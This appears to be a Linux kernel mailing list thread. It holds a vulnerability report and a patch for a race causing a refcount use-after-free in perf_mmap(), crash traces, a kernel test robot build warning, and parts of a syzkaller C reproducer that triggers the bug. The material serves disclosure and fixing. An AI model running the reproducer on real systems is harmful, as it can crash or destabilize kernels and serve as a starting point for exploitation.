NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Hi Haocheng, kernel test robot noticed the following build warnings: [auto build test WARNING on perf-tools-next/perf-tools-next] [also build test WARNING on tip/perf/core perf-tools/perf-tools linus/master v6.19-rc7 next-20260130] [cannot apply to acme/perf/core] [If your patch is applied to the wrong git tree, kindly drop us a note. And when submitting patch, we suggest to use '--base' as documented in https://git-scm.com/docs/git-format-patch#_base_tree_information] url: https://github.com/intel-lab-lkp/linux/commits/Haocheng-Yu/perf-core-Fix-refcount-bug-and-potential-UAF-in-perf_mmap/20260201-193746 base: https://git.kernel.org/pub/scm/linux/kernel/git/perf/perf-tools-next.git perf-tools-next patch link: https://lore.kernel.org/r/20260201113446.4328-1-yuhaocheng035%40gmail.com patch subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap config: mips-randconfig-r072-20260201 (https://download.01.org/0day-ci/archive/20260202/202602020208.m7KIjdzW-lkp@intel.com/config) compiler: clang version 22.0.0git (https://github.com/llvm/llvm-project 9b8addffa70cee5b2acc5454712d9cf78ce45710) smatch version: v0.5.0-8994-gd50c5a4c If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags | Reported-by: kernel test robot <lkp@intel.com> | Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/ smatch warnings: kernel/events/core.c:7183 perf_mmap() warn: inconsistent indenting vim +7183 kernel/events/core.c 7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7131 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7132 static int perf_mmap(struct file *file, struct vm_area_struct *vma) 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7133 { cdd6c482c9ff9c kernel/perf_event.c Ingo Molnar 2009-09-21 7134 struct perf_event *event = file->private_data; 81e026ca47b386 kernel/events/core.c Thomas Gleixner 2025-08-12 7135 unsigned long vma_size, nr_pages; da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7136 mapped_f mapped; 5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7137 int ret; d57e34fdd60be7 kernel/perf_event.c Peter Zijlstra 2010-05-28 7138 c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7139 /* c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7140 * Don't allow mmap() of inherited per-task counters. This would c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7141 * create a performance issue due to all children writing to the 76369139ceb955 kernel/events/core.c Frederic Weisbecker 2011-05-19 7142 * same rb. c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7143 */ c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7144 if (event->cpu == -1 && event->attr.inherit) c7920614cebbf2 kernel/perf_event.c Peter Zijlstra 2010-05-18 7145 return -EINVAL; 4ec8363dfc1451 kernel/events/core.c Vince Weaver 2011-06-01 7146 43a21ea81a2400 kernel/perf_counter.c Peter Zijlstra 2009-03-25 7147 if (!(vma->vm_flags & VM_SHARED)) 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7148 return -EINVAL; 26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7149 da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7150) ret = security_perf_event_read(event); da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7151) if (ret) da97e18458fb42 kernel/events/core.c Joel Fernandes (Google 2019-10-14 7152) return ret; 26cb63ad11e040 kernel/events/core.c Peter Zijlstra 2013-05-28 7153 7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7154 vma_size = vma->vm_end - vma->vm_start; 0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7155 nr_pages = vma_size / PAGE_SIZE; ac9721f3f54b27 kernel/perf_event.c Peter Zijlstra 2010-05-27 7156 0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7157 if (nr_pages > INT_MAX) 0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7158 return -ENOMEM; 9a0f05cb368885 kernel/events/core.c Peter Zijlstra 2011-11-21 7159 0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7160 if (vma_size != PAGE_SIZE * nr_pages) 0c8a4e4139adf0 kernel/events/core.c Peter Zijlstra 2024-11-04 7161 return -EINVAL; 45bfb2e50471ab kernel/events/core.c Peter Zijlstra 2015-01-14 7162 d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7163 scoped_guard (mutex, &event->mmap_mutex) { da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7164 /* da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7165 * This relies on __pmu_detach_event() taking mmap_mutex after marking da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7166 * the event REVOKED. Either we observe the state, or __pmu_detach_event() da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7167 * will detach the rb created here. da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7168 */ d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7169 if (event->state <= PERF_EVENT_STATE_REVOKED) d23a6dbc0a7174 kernel/events/core.c Peter Zijlstra 2025-08-12 7170 return -ENODEV; 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7171 5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7172 if (vma->vm_pgoff == 0) 5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7173 ret = perf_mmap_rb(vma, event, nr_pages); 5d299897f1e360 kernel/events/core.c Peter Zijlstra 2025-08-12 7174 else 2aee3768239133 kernel/events/core.c Peter Zijlstra 2025-08-12 7175 ret = perf_mmap_aux(vma, event, nr_pages); 07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7176 if (ret) 07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7177 return ret; 07091aade394f6 kernel/events/core.c Thomas Gleixner 2025-08-02 7178 9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7179 /* 9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7180 * Since pinned accounting is per vm we cannot allow fork() to copy our 9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7181 * vma. 9bb5d40cd93c9d kernel/events/core.c Peter Zijlstra 2013-06-04 7182 */ 1c71222e5f2393 kernel/events/core.c Suren Baghdasaryan 2023-01-26 @7183 vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7184 vma->vm_ops = &perf_mmap_vmops; 7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7185 da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7186 mapped = get_mapped(event, event_mapped); da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7187 if (mapped) da916e96e2dedc kernel/events/core.c Peter Zijlstra 2024-10-25 7188 mapped(event, vma->vm_mm); 1e0fb9ec679c92 kernel/events/core.c Andy Lutomirski 2014-10-24 7189 f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7190 /* f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7191 * Try to map it into the page table. On fail, invoke f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7192 * perf_mmap_close() to undo the above, as the callsite expects f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7193 * full cleanup in this case and therefore does not invoke f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7194 * vmops::close(). f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7195 */ 191759e5ea9f69 kernel/events/core.c Peter Zijlstra 2025-08-12 7196 ret = map_range(event->rb, vma); f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7197 if (ret) f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7198 perf_mmap_close(vma); 8f75f689bf8133 kernel/events/core.c Haocheng Yu 2026-02-01 7199 } f74b9f4ba63ffd kernel/events/core.c Thomas Gleixner 2025-08-02 7200 7b732a75047738 kernel/perf_counter.c Peter Zijlstra 2009-03-23 7201 return ret; 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7202 } 37d81828385f8f kernel/perf_counter.c Paul Mackerras 2009-03-23 7203 -- 0-DAY CI Kernel Test Service https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Mon, 2 Feb 2026 02:43:48 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static 